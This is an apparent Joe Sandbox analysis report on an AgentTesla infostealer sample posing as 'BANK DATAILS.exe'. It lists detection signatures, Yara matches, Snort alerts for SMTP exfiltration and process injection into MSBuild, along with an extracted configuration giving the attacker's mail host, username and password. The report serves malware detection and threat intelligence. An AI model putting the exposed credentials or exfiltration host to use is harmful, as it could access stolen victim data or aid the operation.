Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BANK DATAILS.exe

Overview

General Information

Sample Name:BANK DATAILS.exe
Analysis ID:679255
MD5:9c8721d5f0dfcb5893766810fc016b1b
SHA1:097e2d6bd75f55fee4ba991696d15bbd0f73137f
SHA256:22083794e761ae3e2fb684244ddadba8353b0dc25549d9591dbbd118dde52054
Tags:agentteslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: MSBuild connects to smtp port
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • BANK DATAILS.exe (PID: 5276 cmdline: "C:\Users\user\Desktop\BANK DATAILS.exe" MD5: 9C8721D5F0DFCB5893766810FC016B1B)
    • MSBuild.exe (PID: 916 cmdline: {path} MD5: D621FD77BD585874F9686D3A76462EF1)
    • MSBuild.exe (PID: 5676 cmdline: {path} MD5: D621FD77BD585874F9686D3A76462EF1)
    • MSBuild.exe (PID: 2908 cmdline: {path} MD5: D621FD77BD585874F9686D3A76462EF1)
  • cleanup
{"Exfil Mode": "SMTP", "Username": "quality@keeprojects.in", "Password": "quality#@!", "Host": "webmail.keeprojects.in"}
SourceRuleDescriptionAuthorStrings
00000006.00000000.285343861.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000006.00000000.285343861.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000006.00000000.285343861.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0x30097:$a13: get_DnsResolver
      • 0x2e899:$a20: get_LastAccessed
      • 0x30a15:$a27: set_InternalServerPort
      • 0x30d31:$a30: set_GuidMasterKey
      • 0x2e9a0:$a33: get_Clipboard
      • 0x2e9ae:$a34: get_Keyboard
      • 0x2fcb2:$a35: get_ShiftKeyDown
      • 0x2fcc3:$a36: get_AltKeyDown
      • 0x2e9bb:$a37: get_Password
      • 0x2f462:$a38: get_PasswordHash
      • 0x30497:$a39: get_DefaultCredentials
      00000000.00000002.297108286.00000000039C9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.297108286.00000000039C9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          Click to see the 10 entries
          SourceRuleDescriptionAuthorStrings
          0.2.BANK DATAILS.exe.3b41a00.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            0.2.BANK DATAILS.exe.3b41a00.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              0.2.BANK DATAILS.exe.3b41a00.1.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
              • 0x30d6c:$s10: logins
              • 0x307d3:$s11: credential
              • 0x2cda0:$g1: get_Clipboard
              • 0x2cdae:$g2: get_Keyboard
              • 0x2cdbb:$g3: get_Password
              • 0x2e0a2:$g4: get_CtrlKeyDown
              • 0x2e0b2:$g5: get_ShiftKeyDown
              • 0x2e0c3:$g6: get_AltKeyDown
              0.2.BANK DATAILS.exe.3b41a00.1.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
              • 0x2e497:$a13: get_DnsResolver
              • 0x2cc99:$a20: get_LastAccessed
              • 0x2ee15:$a27: set_InternalServerPort
              • 0x2f131:$a30: set_GuidMasterKey
              • 0x2cda0:$a33: get_Clipboard
              • 0x2cdae:$a34: get_Keyboard
              • 0x2e0b2:$a35: get_ShiftKeyDown
              • 0x2e0c3:$a36: get_AltKeyDown
              • 0x2cdbb:$a37: get_Password
              • 0x2d862:$a38: get_PasswordHash
              • 0x2e897:$a39: get_DefaultCredentials
              6.0.MSBuild.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                Click to see the 11 entries

                Networking

                barindex
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.195.185.58, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 2908, Protocol: tcp, SourceIp: 192.168.2.3, SourceIsIpv6: false, SourcePort: 49737
                Timestamp:192.168.2.3103.195.185.58497375872839723 08/05/22-13:24:47.100821
                SID:2839723
                Source Port:49737
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3103.195.185.58497375872851779 08/05/22-13:24:47.100944
                SID:2851779
                Source Port:49737
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3103.195.185.58497375872840032 08/05/22-13:24:47.100944
                SID:2840032
                Source Port:49737
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.3103.195.185.58497375872030171 08/05/22-13:24:47.100821
                SID:2030171
                Source Port:49737
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: BANK DATAILS.exeVirustotal: Detection: 54%Perma Link
                Source: BANK DATAILS.exeReversingLabs: Detection: 35%
                Source: webmail.keeprojects.inVirustotal: Detection: 6%Perma Link
                Source: BANK DATAILS.exeJoe Sandbox ML: detected
                Source: 6.0.MSBuild.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: 6.0.MSBuild.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "quality@keeprojects.in", "Password": "quality#@!", "Host": "webmail.keeprojects.in"}
                Source: BANK DATAILS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: BANK DATAILS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Networking

                barindex
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49737 -> 103.195.185.58:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49737 -> 103.195.185.58:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49737 -> 103.195.185.58:587
                Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.3:49737 -> 103.195.185.58:587
                Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
                Source: Joe Sandbox ViewIP Address: 103.195.185.58 103.195.185.58
                Source: global trafficTCP traffic: 192.168.2.3:49737 -> 103.195.185.58:587
                Source: global trafficTCP traffic: 192.168.2.3:49737 -> 103.195.185.58:587
                Source: MSBuild.exe, 00000006.00000002.512007583.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: MSBuild.exe, 00000006.00000002.512007583.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                Source: MSBuild.exe, 00000006.00000002.512007583.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nhEGCU.com
                Source: BANK DATAILS.exeString found in binary or memory: http://tempuri.org/MyCollectionDataSet.xsd
                Source: MSBuild.exe, 00000006.00000002.517794131.0000000003383000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://webmail.keeprojects.in
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.254055255.0000000005909000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.287367631.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: BANK DATAILS.exe, 00000000.00000003.253039302.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/de
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: BANK DATAILS.exe, 00000000.00000003.253469560.000000000593D000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253525233.000000000593D000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253493892.000000000593D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: BANK DATAILS.exe, 00000000.00000003.253469560.000000000593D000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253525233.000000000593D000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253493892.000000000593D000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253575573.000000000593D000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253540774.000000000593D000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253620821.000000000593D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmle
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: BANK DATAILS.exe, 00000000.00000003.253039302.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comF
                Source: BANK DATAILS.exe, 00000000.00000003.253363943.000000000590A000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253039302.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comFHs
                Source: BANK DATAILS.exe, 00000000.00000003.254055255.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comI.TTFds
                Source: BANK DATAILS.exe, 00000000.00000003.254055255.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comals
                Source: BANK DATAILS.exe, 00000000.00000003.253039302.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcom
                Source: BANK DATAILS.exe, 00000000.00000003.254055255.0000000005909000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253363943.000000000590A000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253039302.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comcomdms
                Source: BANK DATAILS.exe, 00000000.00000003.254055255.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comd
                Source: BANK DATAILS.exe, 00000000.00000003.253039302.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comdv
                Source: BANK DATAILS.exe, 00000000.00000003.253039302.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comede
                Source: BANK DATAILS.exe, 00000000.00000003.287367631.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgrita
                Source: BANK DATAILS.exe, 00000000.00000003.253363943.000000000590A000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253039302.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgrito
                Source: BANK DATAILS.exe, 00000000.00000003.287367631.0000000005900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comldom
                Source: BANK DATAILS.exe, 00000000.00000003.254055255.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como
                Source: BANK DATAILS.exe, 00000000.00000003.254055255.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comtto
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.245874250.000000000591B000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.245858860.0000000005924000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.245884516.0000000005924000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.245841440.000000000591B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: BANK DATAILS.exe, 00000000.00000003.249079298.0000000005909000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.248813527.0000000005904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.c
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.248786545.000000000593D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: BANK DATAILS.exe, 00000000.00000003.248813527.0000000005904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn.
                Source: BANK DATAILS.exe, 00000000.00000003.249073188.0000000005904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                Source: BANK DATAILS.exe, 00000000.00000003.249073188.0000000005904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/TDhB
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: BANK DATAILS.exe, 00000000.00000003.248786545.000000000593D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnl-n
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: BANK DATAILS.exe, 00000000.00000003.245996369.0000000005923000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.245926609.0000000005922000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.245609029.0000000005923000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.248046779.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: BANK DATAILS.exe, 00000000.00000003.248046779.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krB
                Source: BANK DATAILS.exe, 00000000.00000003.248046779.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krdq
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.246417212.000000000591B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: BANK DATAILS.exe, 00000000.00000003.246280740.000000000591B000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.246417212.000000000591B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com&Q
                Source: BANK DATAILS.exe, 00000000.00000003.246434562.000000000591B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comaQ
                Source: BANK DATAILS.exe, 00000000.00000003.246434562.000000000591B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comc
                Source: BANK DATAILS.exe, 00000000.00000003.246280740.000000000591B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comh
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: BANK DATAILS.exe, 00000000.00000003.254055255.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: BANK DATAILS.exe, 00000000.00000003.254055255.0000000005909000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deyq
                Source: BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: MSBuild.exe, 00000006.00000002.512007583.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://X837hbNl7u614NNf6o.net
                Source: MSBuild.exe, 00000006.00000002.512007583.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                Source: unknownDNS traffic detected: queries for: webmail.keeprojects.in

                System Summary

                barindex
                Source: 0.2.BANK DATAILS.exe.3b41a00.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.BANK DATAILS.exe.3b41a00.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 6.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 6.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.BANK DATAILS.exe.3b41a00.1.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.BANK DATAILS.exe.3b41a00.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.BANK DATAILS.exe.3a60980.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.BANK DATAILS.exe.3a60980.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000006.00000000.285343861.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000000.00000002.297108286.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: BANK DATAILS.exe PID: 5276, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: MSBuild.exe PID: 2908, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 6.0.MSBuild.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b72ADB0BDu002dE6D8u002d456Cu002dB710u002dD9724B0D01CBu007d/ADCCF321u002d56D8u002d41E2u002dB0A6u002d436B52B63111.csLarge array initialization: .cctor: array initializer size 11618
                Source: BANK DATAILS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.BANK DATAILS.exe.3b41a00.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.BANK DATAILS.exe.3b41a00.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 6.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 6.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.BANK DATAILS.exe.3b41a00.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.BANK DATAILS.exe.3b41a00.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.BANK DATAILS.exe.3a60980.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.BANK DATAILS.exe.3a60980.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000006.00000000.285343861.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000000.00000002.297108286.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: BANK DATAILS.exe PID: 5276, type: MEMORYSTRMatched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, score = file, reference = Internal Research
                Source: Process Memory Space: BANK DATAILS.exe PID: 5276, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: MSBuild.exe PID: 2908, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: C:\Users\user\Desktop\BANK DATAILS.exeCode function: 0_2_00F44A100_2_00F44A10
                Source: C:\Users\user\Desktop\BANK DATAILS.exeCode function: 0_2_00F4C4B40_2_00F4C4B4
                Source: C:\Users\user\Desktop\BANK DATAILS.exeCode function: 0_2_00F44A060_2_00F44A06
                Source: C:\Users\user\Desktop\BANK DATAILS.exeCode function: 0_2_00F4ED600_2_00F4ED60
                Source: C:\Users\user\Desktop\BANK DATAILS.exeCode function: 0_2_00F4ED500_2_00F4ED50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 6_2_0159F0806_2_0159F080
